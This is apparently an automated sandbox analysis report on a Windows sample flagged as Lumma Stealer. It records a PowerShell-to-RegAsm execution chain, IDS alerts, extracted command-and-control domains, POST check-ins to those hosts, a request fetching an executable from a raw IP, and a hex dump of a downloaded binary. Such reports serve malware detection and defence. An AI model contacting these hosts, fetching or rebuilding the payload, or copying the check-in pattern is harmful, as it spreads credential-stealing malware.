Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:49733 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:49734 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49735 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.162.108:443 -> 192.168.2.4:49736 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49737 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:49738 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.208.139:443 -> 192.168.2.4:49739 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.102.49.254:443 -> 192.168.2.4:49740 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.2.13:443 -> 192.168.2.4:49741 version: TLS 1.2

Source: file.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE

Source:	Binary string: C:\Users\Administrator\source\repos\Increase\Increase\obj\Release\net8.0\win-x86\linked\Increase.pdbSHA256 source: file.exe
Source:	Binary string: D:\a\_work\1\s\artifacts\obj\coreclr\windows.x86.Release\dlls\mscordac\mscordaccore.pdb source: file.exe
Source:	Binary string: $^q7C:\Users\user\AppData\Local\Temp\uy2pimwz\uy2pimwz.pdb source: powershell.exe, 00000001.00000002.1735747000.000000000493A000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: C:\Users\Administrator\source\repos\Increase\Increase\obj\Release\net8.0\win-x86\linked\Increase.pdb source: file.exe
Source:	Binary string: D:\a\_work\1\s\artifacts\obj\coreclr\windows.x86.Release\Corehost.Static\singlefilehost.pdb source: file.exe

Software Vulnerabilities

Suspicious execution chain found

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Child: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then bound esi, dword ptr [ecx]	0_2_05445600
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then bound esi, dword ptr [ecx]	0_2_054455F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov eax, dword ptr [esp+3Ch]	5_2_0041050F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov eax, dword ptr [esp]	5_2_00446791
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then cmp dword ptr [edi+edx*8], 2EE0190Fh	5_2_00446791
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov eax, dword ptr [esp]	5_2_004469D9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then cmp dword ptr [edi+edx*8], 2EE0190Fh	5_2_004469D9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then cmp dword ptr [edi+edx*8], 68677325h	5_2_004469D9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov eax, dword ptr [esp+14h]	5_2_00446BA1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov eax, dword ptr [esp]	5_2_0040CED0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then cmp word ptr [ecx+eax+02h], 0000h	5_2_0041D060
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov eax, dword ptr [esp+00000660h]	5_2_0041D060
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov eax, dword ptr [esp]	5_2_0042C070
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov esi, dword ptr [esp+10h]	5_2_00401000
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then cmp dword ptr [ebp+edx*8+00h], 81105F7Ah	5_2_0044A0F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov word ptr [eax], cx	5_2_004280A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov eax, dword ptr [esp]	5_2_004200B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov word ptr [eax], dx	5_2_004200B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov ebx, dword ptr [edi+04h]	5_2_00430250
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov eax, dword ptr [esp]	5_2_0042F320
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then cmp byte ptr [ebx], 00000000h	5_2_004153FD
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then cmp dword ptr [edi+edx*8], 0633C81Dh	5_2_00448390
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then movzx edx, byte ptr [ecx+eax]	5_2_0040F4A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov eax, dword ptr [esp]	5_2_0040F4A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov dword ptr [esp], 00000000h	5_2_0041A4B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov eax, dword ptr [esp+00000660h]	5_2_0041E576
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then movzx edx, word ptr [ecx+eax]	5_2_0041E576
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then cmp dword ptr [esi+edx*8], 77DD2217h	5_2_0041E576
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then cmp word ptr [ebp+edi+02h], 0000h	5_2_00426530
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then jmp ecx	5_2_0043F530
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov byte ptr [ebx+eax], 00000000h	5_2_0042E638
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then jmp ecx	5_2_0043F762
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then cmp dword ptr [ebx+edx*8], 1B788DCFh	5_2_00443760
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then push edi	5_2_0041D791
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov word ptr [eax], cx	5_2_004267B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then cmp dword ptr [edi+edx*8], 54CA534Eh	5_2_004478C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov ebx, ecx	5_2_004138C6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then cmp dword ptr [esi+edx*8], 0633C81Dh	5_2_004448D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov eax, dword ptr [esp]	5_2_004448D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov eax, dword ptr [esp]	5_2_004288E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then movzx ebx, byte ptr [edx]	5_2_0043A950
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov ebx, ecx	5_2_004139AC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov ecx, eax	5_2_004139AC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then jmp eax	5_2_004139AC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then dec ebx	5_2_0043E9B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov eax, dword ptr [esp+3Ch]	5_2_00410A80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then movzx edx, byte ptr [esi+edi]	5_2_00404AB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then movzx ecx, word ptr [edi+eax]	5_2_00447AB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then movzx edx, byte ptr [esi+ebx]	5_2_00405B40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov eax, dword ptr [esp+14h]	5_2_00446BA1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov eax, dword ptr [esp+14h]	5_2_00446C72
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then cmp dword ptr [esi+edx*8], CECD21FDh	5_2_0042BC00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then cmp dword ptr [edi+edx*8], CECD21FDh	5_2_0042BC00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then jmp eax	5_2_00448C00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov word ptr [ebx], ax	5_2_0042EC9D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then cmp dword ptr [ebx+edx*8], 7E28BDA7h	5_2_00449DE0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov byte ptr [edi], al	5_2_00431DF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov byte ptr [edi], al	5_2_00431DF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov byte ptr [edi], al	5_2_00431DF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov byte ptr [edi], al	5_2_00431DF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov byte ptr [edi], al	5_2_00431DF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov eax, dword ptr [esp+00000100h]	5_2_0041FE7D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then cmp dword ptr [esi+edx*8], 0633C81Dh	5_2_00443E80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov eax, dword ptr [ebp-14h]	5_2_00428EB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov eax, dword ptr [esp+000001C0h]	5_2_00412EBD
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then movzx edi, byte ptr [ecx+esi]	5_2_00406F60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then movzx eax, word ptr [esi+ecx]	5_2_00440F70
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then cmp dword ptr [ebx+edx*8], 7E28BDA7h	5_2_00449F70
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then jmp ecx	5_2_0043EF7E

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2056164 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (gutterydhowi .shop) : 192.168.2.4:57092 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2056156 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (drawzhotdog .shop) : 192.168.2.4:57422 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2056158 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (vozmeatillu .shop) : 192.168.2.4:54684 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2056154 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (fragnantbui .shop) : 192.168.2.4:64256 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2056160 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (offensivedzvju .shop) : 192.168.2.4:60410 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2056163 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (ghostreedmnu .shop in TLS SNI) : 192.168.2.4:49733 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2056152 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (stogeneratmns .shop) : 192.168.2.4:50375 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2056150 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (reinforcenh .shop) : 192.168.2.4:52826 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2056157 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (drawzhotdog .shop in TLS SNI) : 192.168.2.4:49736 -> 172.67.162.108:443
Source: Network traffic	Suricata IDS: 2056165 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (gutterydhowi .shop in TLS SNI) : 192.168.2.4:49732 -> 104.21.4.136:443
Source: Network traffic	Suricata IDS: 2056159 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (vozmeatillu .shop in TLS SNI) : 192.168.2.4:49735 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2056151 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (reinforcenh .shop in TLS SNI) : 192.168.2.4:49739 -> 172.67.208.139:443
Source: Network traffic	Suricata IDS: 2056161 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (offensivedzvju .shop in TLS SNI) : 192.168.2.4:49734 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2056155 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (fragnantbui .shop in TLS SNI) : 192.168.2.4:49737 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2056153 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (stogeneratmns .shop in TLS SNI) : 192.168.2.4:49738 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2056162 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (ghostreedmnu .shop) : 192.168.2.4:64591 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.4:49735 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.4:49738 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49735 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49738 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.4:49734 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49734 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.4:49733 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49733 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.4:49741 -> 104.21.2.13:443
Source: Network traffic	Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.4:49739 -> 172.67.208.139:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49741 -> 104.21.2.13:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49739 -> 172.67.208.139:443
Source: Network traffic	Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.4:49731 -> 104.21.83.105:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49731 -> 104.21.83.105:443
Source: Network traffic	Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.4:49736 -> 172.67.162.108:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49736 -> 172.67.162.108:443
Source: Network traffic	Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.4:49732 -> 104.21.4.136:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49732 -> 104.21.4.136:443
Source: Network traffic	Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.4:49737 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49737 -> 188.114.97.3:443

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor	URLs: ptramidermsnqj.shop
Source: Malware configuration extractor	URLs: reinforcenh.shop
Source: Malware configuration extractor	URLs: gutterydhowi.shop
Source: Malware configuration extractor	URLs: stogeneratmns.shop
Source: Malware configuration extractor	URLs: vozmeatillu.shop
Source: Malware configuration extractor	URLs: offensivedzvju.shop
Source: Malware configuration extractor	URLs: fragnantbui.shop
Source: Malware configuration extractor	URLs: ghostreedmnu.shop
Source: Malware configuration extractor	URLs: drawzhotdog.shop

Source: global traffic

HTTP traffic detected: HTTP/1.1 200 OKDate: Thu, 26 Sep 2024 19:06:05 GMTServer: Apache/2.4.52 (Ubuntu)Last-Modified: Thu, 26 Sep 2024 14:25:26 GMTETag: "f4800-6230682795730"Accept-Ranges: bytesContent-Length: 1001472Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 55 7d 8f a0 00 00 00 00 00 00 00 00 e0 00 22 00 0b 01 30 00 00 3c 0f 00 00 0a 00 00 00 00 00 00 de 5a 0f 00 00 20 00 00 00 60 0f 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 a0 0f 00 00 02 00 00 00 00 00 00 02 00 60 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 84 5a 0f 00 57 00 00 00 00 60 0f 00 36 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 0f 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 e4 3a 0f 00 00 20 00 00 00 3c 0f 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 36 06 00 00 00 60 0f 00 00 08 00 00 00 3e 0f 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 80 0f 00 00 02 00 00 00 46 0f 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 5a 0f 00 00 00 00 00 48 00 00 00 02 00 05 00 00 22 00 00 84 38 0f 00 03 00 02 00 07 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 1e 02 28 13 00 00 0a 2a ce 28 14 00 00 0a 72 4e 93 00 70 28 15 00 00 0a 6f 16 00 00 0a 80 01 00 00 04 28 14 00 00 0a 72 f9 93 00 70 28 15 00 00 0a 6f 16 00 00 0a 80 02 00 00 04 2a 56 7e 01 00 00 04 72 43 94 00 70 28 15 00 00 0a 28 03 00 00 06 2a 00 00 13 30 05 00 63 00 00 00 01 00 00 11 28 0f 00 00 0a 03 6f 10 00 00 0a 0a 02 02 8e 69 17 59 91 1f 70 61 0b 02 8e 69 8d 12 00 00 01 0c 16 0d 16 13 04 2b 27 08 11 04 02 11 04 91 07 61 06 09 91 61 d2 9c 09 03 6f 11 00 00 0a 17 59 2e 05 09 17 58 2b 01 16 0d 11 04 17 58 13 04 11 04 02 8e 69 32 d2 12 02 02 8e 69 17 59 28 01 00 00 2b 08 2a 00 13 30 06 00 df 00 00 00 02 00 00 11 28 14 00 00 0a 72 01 00 00 70 28 15 00 00 0a 6f 16 00 00 0a 28 15 00 00 0a 7e 02 00 00 04 28 01 00 00 06 0a 28 14 00 00 0a 06 6f 16 00 00 0a 0b 73 17 00 00 0a 73 18 00 00 0a 0c 08 6f 19 00 00 0a 28 14 00 00 0a 72 be 92 00 70 28 15 00 00 0a 6f 16 00 00 0a 6f 1a 00 00 0a 26 08 6f 19 0

Source: global traffic

HTTP traffic detected: GET /files/gqgqg.exe HTTP/1.1Host: 147.45.44.131Connection: Keep-Alive

Source: Joe Sandbox View	IP Address: 104.21.4.136 104.21.4.136
Source: Joe Sandbox View	IP Address: 147.45.44.131 147.45.44.131
Source: Joe Sandbox View	IP Address: 188.114.97.3 188.114.97.3
Source: Joe Sandbox View	IP Address: 188.114.97.3 188.114.97.3

Source: Joe Sandbox View	ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
Source: Joe Sandbox View	ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS

Source: Joe Sandbox View

JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1

Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: ptramidermsnqj.shop
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: gutterydhowi.shop
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: ghostreedmnu.shop
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: offensivedzvju.shop
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: vozmeatillu.shop
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: drawzhotdog.shop
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: fragnantbui.shop
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: stogeneratmns.shop
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: reinforcenh.shop
Source: global traffic	HTTP traffic detected: GET /profiles/76561199724331900 HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: steamcommunity.com
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: ballotnwu.site

Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.44.131
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.44.131
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.44.131
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.44.131
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.44.131
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.44.131
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.44.131
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.44.131
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.44.131
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.44.131
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.44.131
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.44.131
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.44.131
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.44.131
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.44.131
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.44.131
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.44.131
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.44.131
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.44.131
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.44.131
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.44.131
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.44.131
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.44.131
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.44.131
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.44.131
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.44.131
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.44.131
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.44.131
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.44.131
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.44.131
